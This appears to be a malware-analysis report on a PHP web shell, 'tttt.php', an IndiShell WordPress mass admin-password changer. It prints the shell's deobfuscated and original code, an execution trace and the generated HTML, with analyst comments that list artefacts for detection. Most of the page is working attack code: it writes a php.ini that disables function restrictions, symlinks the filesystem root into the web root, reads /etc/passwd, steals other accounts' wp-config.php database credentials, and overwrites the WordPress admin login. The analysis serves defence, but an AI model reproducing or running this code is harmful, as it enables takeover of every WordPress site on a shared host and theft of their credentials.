PHP Malware Analysis

tttt.php

md5: aab8060e14a99064f125b557571d4d6b


Screenshot


Attributes

Environment

Execution

Files

Input

Title
  • --==[[Code breaker ICA wordpress mass username/password changer By Team IndiShell]]==-- (HTML, Original, Traces)

URLs


Deobfuscated PHP code

<?php

$head = '
<html>
<head>
</script>
<title>--==[[Code breaker ICA wordpress mass username/password changer By Team IndiShell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<STYLE>
body {
background-image: url("https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-snc7/486315_113855152078761_1409525525_n.jpg");
background-position: center center;
background-repeat: no-repeat;
background-size: 400px 650px;
background-color: #000000;
background-attachment: fixed;
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border			: dashed 1px;
border-color		: #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border			: dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
	SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin			: -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}

A:link {
	COLOR: White; TEXT-DECORATION: none
}
A:visited {
	COLOR: White; TEXT-DECORATION: none
}
A:hover {
	color: Red; TEXT-DECORATION: none
}
A:active {
	color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}
</script>';
?>
<html>
	<head>
		<?php 
echo "\r\n<html>\r\n<head>\r\n</script>\r\n<title>--==[[Code breaker ICA wordpress mass username/password changer By Team IndiShell]]==--</title>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\r\n\r\n<STYLE>\r\nbody {\r\nbackground-image: url(\"https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-snc7/486315_113855152078761_1409525525_n.jpg\");\r\nbackground-position: center center;\r\nbackground-repeat: no-repeat;\r\nbackground-size: 400px 650px;\r\nbackground-color: #000000;\r\nbackground-attachment: fixed;\r\nfont-family: Tahoma\r\n}\r\ntr {\r\nBORDER: dashed 1px #333;\r\ncolor: #FFF;\r\n}\r\ntd {\r\nBORDER: dashed 1px #333;\r\ncolor: #FFF;\r\n}\r\n.table1 {\r\nBORDER: 0px Black;\r\nBACKGROUND-COLOR: Black;\r\ncolor: #FFF;\r\n}\r\n.td1 {\r\nBORDER: 0px;\r\nBORDER-COLOR: #333333;\r\nfont: 7pt Verdana;\r\ncolor: Green;\r\n}\r\n.tr1 {\r\nBORDER: 0px;\r\nBORDER-COLOR: #333333;\r\ncolor: #FFF;\r\n}\r\ntable {\r\nBORDER: dashed 1px #333;\r\nBORDER-COLOR: #333333;\r\nBACKGROUND-COLOR: Black;\r\ncolor: #FFF;\r\n}\r\ninput {\r\nborder\t\t\t: dashed 1px;\r\nborder-color\t\t: #333;\r\nBACKGROUND-COLOR: Black;\r\nfont: 8pt Verdana;\r\ncolor: Red;\r\n}\r\nselect {\r\nBORDER-RIGHT:  Black 1px solid;\r\nBORDER-TOP:    #DF0000 1px solid;\r\nBORDER-LEFT:   #DF0000 1px solid;\r\nBORDER-BOTTOM: Black 1px solid;\r\nBORDER-color: #FFF;\r\nBACKGROUND-COLOR: Black;\r\nfont: 8pt Verdana;\r\ncolor: Red;\r\n}\r\nsubmit {\r\nBORDER:  buttonhighlight 2px outset;\r\nBACKGROUND-COLOR: Black;\r\nwidth: 30%;\r\ncolor: #FFF;\r\n}\r\ntextarea {\r\nborder\t\t\t: dashed 1px #333;\r\nBACKGROUND-COLOR: Black;\r\nfont: Fixedsys bold;\r\ncolor: #999;\r\n}\r\nBODY {\r\n\tSCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF\r\nmargin: 1px;\r\ncolor: Red;\r\nbackground-color: Black;\r\n}\r\n.main {\r\nmargin\t\t\t: 
-287px 0px 0px -490px;\r\nBORDER: dashed 1px #333;\r\nBORDER-COLOR: #333333;\r\n}\r\n.tt {\r\nbackground-color: Black;\r\n}\r\n\r\nA:link {\r\n\tCOLOR: White; TEXT-DECORATION: none\r\n}\r\nA:visited {\r\n\tCOLOR: White; TEXT-DECORATION: none\r\n}\r\nA:hover {\r\n\tcolor: Red; TEXT-DECORATION: none\r\n}\r\nA:active {\r\n\tcolor: Red; TEXT-DECORATION: none\r\n}\r\n</STYLE>\r\n<script language='javascript'>\r\nfunction hide_div(id)\r\n{\r\n  document.getElementById(id).style.display = 'none';\r\n  document.cookie=id+'=0;';\r\n}\r\nfunction show_div(id)\r\n{\r\n  document.getElementById(id).style.display = 'block';\r\n  document.cookie=id+'=1;';\r\n}\r\nfunction change_divst(id)\r\n{\r\n  if (document.getElementById(id).style.display == 'none')\r\n    show_div(id);\r\n  else\r\n    hide_div(id);\r\n}\r\n</script>";
echo "\r\n<div align=center><font color=white font size=4><marquee behavior=\"scroll\" direction=\"left\" scrollamount=\"2\" scrolldelay=\"3\" width=\"50%\"><span class=\"footerlink\">Special f**k goes to my best buddy  \"Suriya CyberTyson\" <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif></span></marquee><br></font></div>\r\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" class=\"tb1\" >\r\n\r\n\t\t\t\r\n\r\n       <td width=\"100%\" align=center valign=\"top\" rowspan=\"1\">\r\n           <font color=#ff9933 size=5 face=\"comic sans ms\"><b>--==[[ Code Breaker ICA ]]==--</font><font color=white size=5 face=\"comic sans ms\"><b><br> <font color=#ff9933 size=5 face=\"comic sans ms\">--==[[ <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> w0rdpress  mass  </font><font color=white size=5 face=\"comic sans ms\">admin panel username/pasword </font><font color=green size=5 face=\"comic sans ms\"><b>changer By Team  IndiShell <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif> ]]==--</font> <div class=\"hedr\"> \r\n\r\n        <td height=\"10\" align=\"left\" class=\"td1\"></td></tr><tr><td \r\n        width=\"100%\" align=\"center\" valign=\"top\" rowspan=\"1\"><font \r\n        color=\"red\" face=\"comic sans ms\"size=\"1\"><b> \r\n        <font color=#ff9933> \r\n        ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font><br><font color=white>-==[[Greetz to]]==--</font><br>   Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>Striker india,cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. 
Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk<br>Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL<br>\r\n\r\n<font color=white>--==[[Dedicated to]]==--</font>\r\n<br># SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #<br><font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>Deepika Kaushik</font><br><font color=#ff9933> \r\n        ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font>\r\n\t\t\t\t\t\t\r\n           </table>\r\n        \r\n</table>\r\n";
?>
 <body bgcolor=black><h3 style="text-align:center">
 <form method=post><font color=white size=3 face="comic sans ms">Bhai ji ,Run php.ini first of all :) <br>The button given below generates php.ini file :)</font><br>
<input type=submit name=ini value="use to Generate PHP.ini" /></form>

<?php 
// Analyst note: the POST field "ini" makes the script drop a file named php.ini
// next to itself (relative path) containing "disable_functions=none".
// Presumably this targets hosts where PHP reads a php.ini from the script's own
// directory, so that a hoster's disable_functions hardening no longer blocks the
// shell_exec() call made further down in this file (confirm against the SAPI in use).
// Detection: a php.ini that sets disable_functions inside a web-writable directory
// is a strong indicator; the trace on this page shows the sample running from
// /var/www/html/uploads/.
if (isset($_POST['ini'])) {
    // Opened for writing with a relative path; the handle is never closed explicitly.
    $r = fopen('php.ini', 'w');
    $rr = " disable_functions=none ";
    fwrite($r, $rr);
    // $link is assigned but not used in this deobfuscated listing; the same markup is echoed directly below.
    $link = "<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
    echo "<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
    echo "<br>";
}
?>
 <div align=center><table width=60%><tr><td align=center><a href="<?php 
echo "?whole";
?>"><font color=white size=3 face="comic sans ms">change user/pass for whole server</font></a></td><td align=center><a href="<?php 
echo "?particular";
?>"><font color=white size=3 face="comic sans ms">change user/pass for particualr users</a></font></td></tr></table><br>
 
<?php 
// Analyst note: the query parameter "whole" only renders the operator form for the
// server-wide mode. The form posts the fields uname, pass and start back to this script.
// The pre-filled values ("Team" / "INDISHELL") are useful pivots when checking
// WordPress user tables for accounts that were overwritten with the defaults.
if (isset($_GET['whole'])) {
    echo "<font color=white size=3 face=\"comic sans ms\">bhai ji , please fill the username/password that you want to set on admin panels :)<br><form method=post><font color=white size=3 face=\"comic sans ms\">";
    echo "username:<input type=text name=uname value=Team><br>";
    echo "Password<input type=text name=pass value=INDISHELL></font><br>";
    echo "<input type=submit name=start value=\"start 8-)\"><p>";
}
// Turns off PHP error reporting from this point on, so failures in the code below
// produce no visible warnings or notices.
error_reporting(0);
/**
 * Returns the trimmed text found between two marker strings.
 *
 * Takes the segment that follows the first occurrence of $marqueurDebutLien in
 * $text and returns the part of that segment that precedes the first occurrence
 * of $marqueurFinLien. The script uses it to read the DB_USER, DB_PASSWORD,
 * DB_NAME and table-prefix values out of fetched wp-config.php text.
 *
 * @param string $text              Text to search.
 * @param string $marqueurDebutLien Start marker.
 * @param string $marqueurFinLien   End marker.
 * @return string Trimmed text between the markers.
 */
function entre2v2($text, $marqueurDebutLien, $marqueurFinLien)
{
    // Index 1 is the piece right after the first start marker; it is read without checking that it exists.
    $ar0 = explode($marqueurDebutLien, $text);
    // Index 0 is everything in that piece up to the first end marker.
    $ar1 = explode($marqueurFinLien, $ar0[1]);
    $ar = trim($ar1[0]);
    return $ar;
}
// Analyst note: "whole server" mode, triggered by the POST field "start".
// Sequence visible below: (1) create Indishell/ with a permissive .htaccess and a
// symlink to "/", (2) list local account names from /etc/passwd, (3) fetch each
// account's WordPress config through the symlink over HTTP, (4) use the recovered
// database credentials to overwrite the login and password of WordPress user ID 1.
// Artefacts to hunt for: a directory named Indishell, Indishell/.htaccess, the
// symlink Indishell/root -> /, and access-log requests from the server to itself
// for .../Indishell/root/home/<user>/public_html/wp-config.php.
if (isset($_POST['start'])) {
    // Operator-chosen credentials, taken from POST without validation.
    $uname = $_POST['uname'];
    $pass = $_POST['pass'];
    ////////////////////////////////////////////////////////
    /////////////////// symlink ///////////////////
    ////////////////////////////////////////////////////////
    // Working directory created relative to the script, with requested mode 0777.
    mkdir('Indishell', 0777);
    // .htaccess payload: "Options all" switches on the Options features (symlink following
    // included); the AddType/AddHandler lines are meant to have .php and .html returned as
    // plain text instead of being executed; "Require None" / "Satisfy Any" look intended to
    // lift access restrictions. It only takes effect where AllowOverride permits these directives.
    $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    $g = fopen('Indishell/.htaccess', 'w');
    fwrite($g, $rr);
    // Exposes the filesystem root beneath the web root. Mitigations: SymLinksIfOwnerMatch
    // instead of FollowSymLinks, a restrictive AllowOverride, and per-account isolation
    // (open_basedir, separate PHP users) so one site cannot read another account's files.
    symlink("/", "Indishell/root");
    if (!is_dir('Indishell/root')) {
        echo "sorry bhai ji , script could not symlink / folder :( ";
    } else {
        // Prints the names of /etc/passwd entries whose UID is above 500 and is neither
        // 65534 nor 1000. It runs through shell_exec(), so it yields nothing where
        // disable_functions blocks that function.
        $cmd = "awk -F : '(\$3>500) && (\$3!=65534) && (\$3!=1000)' /etc/passwd | cut -f 1 -d ':' ";
        $c = shell_exec($cmd);
        $usr = explode("\n", $c);
        foreach ($usr as $us) {
            $u = trim($us);
            // The request goes back to this same host name and walks the symlink to /home/<user>/public_html/.
            $base_url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/Indishell/root/home/';
            $confi = array("wp-config.php", "blog/wp-config.php", "wordpress/wp-login.php");
            foreach ($confi as $co) {
                // '@' hides fetch errors; a response body containing "DB_NAME" is treated as a WordPress config.
                $uurl = @file_get_contents($base_url . $u . "/public_html/" . $co);
                if ($uurl && preg_match('/DB_NAME/i', $uurl)) {
                    echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> website cms is wordpress of user {$u} </font></td></tr></table>";
                    $wl = $base_url . $u . "/public_html/" . $co;
                    // The same URL is fetched a second time.
                    $text = file_get_contents($wl);
                    $uname = $_POST['uname'];
                    // Database user, password, name and table prefix are cut out of the config text.
                    $dbu = entre2v2($text, "define('DB_USER', '", "');");
                    $dbp = entre2v2($text, "define('DB_PASSWORD', '", "');");
                    $dbn = entre2v2($text, "define('DB_NAME', '", "');");
                    $tp = entre2v2($text, "{$table_prefix} = '", "'");
                    // The replacement password is stored as an unsalted MD5 hex digest.
                    $npwd = md5($pass);
                    $host = "localhost";
                    // Legacy ext/mysql API (removed in PHP 7.0); the connection uses the victim site's own credentials.
                    $dbconnect = @mysql_connect($host, $dbu, $dbp);
                    $dbselect = @mysql_select_db($dbn, $dbconnect);
                    if ($dbselect) {
                        echo "<font color=red>database {$dbn} has been selected<br>";
                        // Both UPDATEs hit row ID = 1 of the <prefix>users table; $uname is concatenated
                        // into the SQL unescaped. Database-side traces: a changed user_login for ID 1 and a
                        // 32-character hex user_pass. Recovery has to rotate the database password in every
                        // exposed wp-config.php, not only reset the admin account.
                        $ru = @mysql_query("UPDATE `" . $tp . "users` SET `user_login` ='" . $uname . "' WHERE ID = 1");
                        $ru = @mysql_query("UPDATE `" . $tp . "users` SET `user_pass` ='" . $npwd . "' WHERE ID = 1");
                        // Reads the site's 'home' option only to print which site was modified.
                        $req = mysql_query("SELECT * from `" . $tp . "options` WHERE option_name='home'");
                        $data = mysql_fetch_array($req);
                        $site_url = $data["option_value"];
                        echo "website is " . $data["option_value"];
                        // Only the second UPDATE's result is tested here; the first $ru was overwritten.
                        if (!$ru) {
                            echo "<font size=2 color=red face='comic sans ms'><br>could not update username/password :P</font>";
                        } else {
                            echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>bhai ji,username {$uname} and password {$pass} has been updated for ID=1 :D</font></td></tr></table><br>";
                        }
                    }
                }
            }
        }
    }
}
?> 
<?php 
// Analyst note: the query parameter "particular" only renders the operator form for the
// targeted mode. The form posts uname, pass, a newline-separated account list in the
// textarea "wen", and the submit field "cant" back to this script. These field names
// can be matched in captured POST bodies or WAF logs.
if (isset($_GET['particular'])) {
    ?>
<font size=3 color=white face="comic sans ms">Put the wordpress website usernames for mass user/password change<br></font>
<form method=post>
<font size=3 color=white face="comic sans ms"> username:<input type=text name=uname value=Team><br>
Password<input type=text name=pass value=INDISHELL></font><br>
<font color=red size=3 face="comic sans ms">user list<br><textarea rows=6 cols=45 name=wen></textarea>
<br><br><input type=submit name=cant value="bhaiyu.... click me and i will try to hex this shit XD" /></form><p>
<?php 
}
// Analyst note: "particular users" mode, triggered by the POST field "cant".
// It performs the symlink / config-read / database-update sequence against account
// names supplied by the operator in the POST field "wen" (one per line). Unlike the
// server-wide branch it does not call shell_exec() and does not check that the symlink
// was created. Artefacts: Indishell/, Indishell/.htaccess, the symlink Indishell/root -> /,
// and self-originated requests for .../Indishell/root/home/<user>/public_html/wp-config.php.
if (isset($_POST['cant'])) {
    error_reporting(0);
    // All three values come straight from POST without validation.
    $uname = $_POST['uname'];
    $pass = $_POST['pass'];
    $users = $_POST['wen'];
    // Working directory created relative to the script, with requested mode 0777.
    mkdir('Indishell', 0777);
    // .htaccess payload: enables the Options features (symlink following included) and is meant
    // to have .php/.html returned as plain text; effective only where AllowOverride permits it.
    $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    $g = fopen('Indishell/.htaccess', 'w');
    fwrite($g, $rr);
    // Exposes the filesystem root beneath the web root; SymLinksIfOwnerMatch and per-account
    // isolation (open_basedir, separate PHP users) are the relevant server-side controls.
    symlink("/", "Indishell/root");
    $use = explode("\n", $users);
    foreach ($use as $us) {
        $u = trim($us);
        // The supplied name is written into the page without HTML escaping.
        echo "<font color=red size=3 face=\"comic sans ms\">" . $u;
        // The request goes back to this same host name and walks the symlink to /home/<user>/public_html/.
        $base_url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/Indishell/root/home/';
        $confi = array("wp-config.php", "blog/wp-config.php", "wordpress/wp-login.php");
        foreach ($confi as $co) {
            // '@' hides fetch errors; a response body containing "DB_NAME" is treated as a WordPress config.
            $uurl = @file_get_contents($base_url . $u . "/public_html/" . $co);
            if ($uurl && preg_match('/DB_NAME/i', $uurl)) {
                echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> website cms is wordpress of user {$u} </font></td></tr></table>";
                $wl = $base_url . $u . "/public_html/" . $co;
                $text = file_get_contents($wl);
                $uname = $_POST['uname'];
                // Database user, password, name and table prefix are cut out of the config text.
                $dbu = entre2v2($text, "define('DB_USER', '", "');");
                $dbp = entre2v2($text, "define('DB_PASSWORD', '", "');");
                $dbn = entre2v2($text, "define('DB_NAME', '", "');");
                $tp = entre2v2($text, "{$table_prefix} = '", "'");
                // The replacement password is stored as an unsalted MD5 hex digest.
                $npwd = md5($pass);
                $host = "localhost";
                // Legacy ext/mysql API (removed in PHP 7.0); the connection uses the victim site's own credentials.
                $dbconnect = @mysql_connect($host, $dbu, $dbp);
                $dbselect = @mysql_select_db($dbn, $dbconnect);
                if ($dbselect) {
                    echo "<font color=red>database {$dbn} has been selected<br>";
                    // Both UPDATEs hit row ID = 1 of the <prefix>users table; $uname is concatenated into
                    // the SQL unescaped. Database-side traces: a changed user_login for ID 1 and a
                    // 32-character hex user_pass.
                    $ru = @mysql_query("UPDATE `" . $tp . "users` SET `user_login` ='" . $uname . "' WHERE ID = 1");
                    $ru = @mysql_query("UPDATE `" . $tp . "users` SET `user_pass` ='" . $npwd . "' WHERE ID = 1");
                    // Reads the site's 'home' option only to print which site was modified.
                    $req = mysql_query("SELECT * from `" . $tp . "options` WHERE option_name='home'");
                    $data = mysql_fetch_array($req);
                    $site_url = $data["option_value"];
                    echo "website is " . $data["option_value"];
                    // Only the second UPDATE's result is tested here; the first $ru was overwritten.
                    if (!$ru) {
                        echo "<font size=2 color=red face='comic sans ms'><br>could not update username/password :P</font>";
                    } else {
                        echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>bhai ji,username {$uname} and password {$pass} has been updated for ID=1 :D</font></td></tr></table><br>";
                    }
                }
            }
        }
    }
}
?> 

Execution traces

data/traces/aab8060e14a99064f125b557571d4d6b_trace-1676247983.3414.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:26:49.239179]
1	0	1	0.000145	393512
1	3	0	0.000422	439368	{main}	1		/var/www/html/uploads/tttt.php	0	0
1		A						/var/www/html/uploads/tttt.php	6	$head = '\r\n<html>\r\n<head>\r\n</script>\r\n<title>--==[[Code breaker ICA wordpress mass username/password changer By Team IndiShell]]==--</title>\r\n<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">\r\n\r\n<STYLE>\r\nbody {\r\nbackground-image: url("https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-snc7/486315_113855152078761_1409525525_n.jpg");\r\nbackground-position: center center;\r\nbackground-repeat: no-repeat;\r\nbackground-size: 400px 650px;\r\nbackground-color: #000000;\r\nbackground-att'
2	4	0	0.000486	439480	error_reporting	0		/var/www/html/uploads/tttt.php	189	1	0
2	4	1	0.000502	439520
2	4	R			22527
1	3	1	0.000518	439480
			0.000544	319192
TRACE END   [2023-02-12 22:26:49.239609]


Generated HTML code

<html><head>
		



<title>--==[[Code breaker ICA wordpress mass username/password changer By Team IndiShell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<style>
body {
background-image: url("https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-snc7/486315_113855152078761_1409525525_n.jpg");
background-position: center center;
background-repeat: no-repeat;
background-size: 400px 650px;
background-color: #000000;
background-attachment: fixed;
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border			: dashed 1px;
border-color		: #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border			: dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
	SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin			: -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}

A:link {
	COLOR: White; TEXT-DECORATION: none
}
A:visited {
	COLOR: White; TEXT-DECORATION: none
}
A:hover {
	color: Red; TEXT-DECORATION: none
}
A:active {
	color: Red; TEXT-DECORATION: none
}
</style>
<script language="javascript">
function hide_div(id)
{
  document.getElementById(id).style.display = 'none';
  document.cookie=id+'=0;';
}
function show_div(id)
{
  document.getElementById(id).style.display = 'block';
  document.cookie=id+'=1;';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == 'none')
    show_div(id);
  else
    hide_div(id);
}
</script>
</head><body bgcolor="black"><div align="center"><font color="white" font="" size="4"><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="3" width="50%"><span class="footerlink">Special f**k goes to my best buddy  "Suriya CyberTyson" <img src="http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif"></span></marquee><br></font></div>
<table width="100%" cellspacing="0" cellpadding="0" class="tb1">

			

       <tbody><tr><td width="100%" align="center" valign="top" rowspan="1">
           <font color="#ff9933" size="5" face="comic sans ms"><b>--==[[ Code Breaker ICA ]]==--</b></font><b><font color="white" size="5" face="comic sans ms"><b><br> <font color="#ff9933" size="5" face="comic sans ms">--==[[ <img src="http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif"> w0rdpress  mass  </font><font color="white" size="5" face="comic sans ms">admin panel username/pasword </font><font color="green" size="5" face="comic sans ms"><b>changer By Team  IndiShell <img src="http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/4.gif"> ]]==--</b></font><b> <div class="hedr"> 

        </div></b></b></font></b></td><td height="10" align="left" class="td1"></td></tr><tr><td width="100%" align="center" valign="top" rowspan="1"><font color="red" face="comic sans ms" size="1"><b> 
        <font color="#ff9933"> 
        ####################################################</font><font color="white">#####################################################</font><font color="green">####################################################</font><br><font color="white">-==[[Greetz to]]==--</font><br>   Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>Striker india,cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk<br>Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL<br>

<font color="white">--==[[Dedicated to]]==--</font>
<br># SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #<br><font color="white">--==[[Interface Desgined By]]==--</font><br><font color="red">Deepika Kaushik</font><br><font color="#ff9933"> 
        ####################################################</font><font color="white">#####################################################</font><font color="green">####################################################</font>
						
           </b></font></td></tr></tbody></table>
        

 <h3 style="text-align:center">
 <form method="post"><font color="white" size="3" face="comic sans ms">Bhai ji ,Run php.ini first of all :) <br>The button given below generates php.ini file :)</font><br>
<input type="submit" name="ini" value="use to Generate PHP.ini"></form>

 <div align="center"><table width="60%"><tbody><tr><td align="center"><a href="?whole"><font color="white" size="3" face="comic sans ms">change user/pass for whole server</font></a></td><td align="center"><a href="?particular"><font color="white" size="3" face="comic sans ms">change user/pass for particualr users</font></a></td></tr></tbody></table><br>
 
 
 </div></h3></body></html>

Original PHP code

<?php




 $head = '
<html>
<head>
</script>
<title>--==[[Code breaker ICA wordpress mass username/password changer By Team IndiShell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<STYLE>
body {
background-image: url("https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-snc7/486315_113855152078761_1409525525_n.jpg");
background-position: center center;
background-repeat: no-repeat;
background-size: 400px 650px;
background-color: #000000;
background-attachment: fixed;
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border			: dashed 1px;
border-color		: #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border			: dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
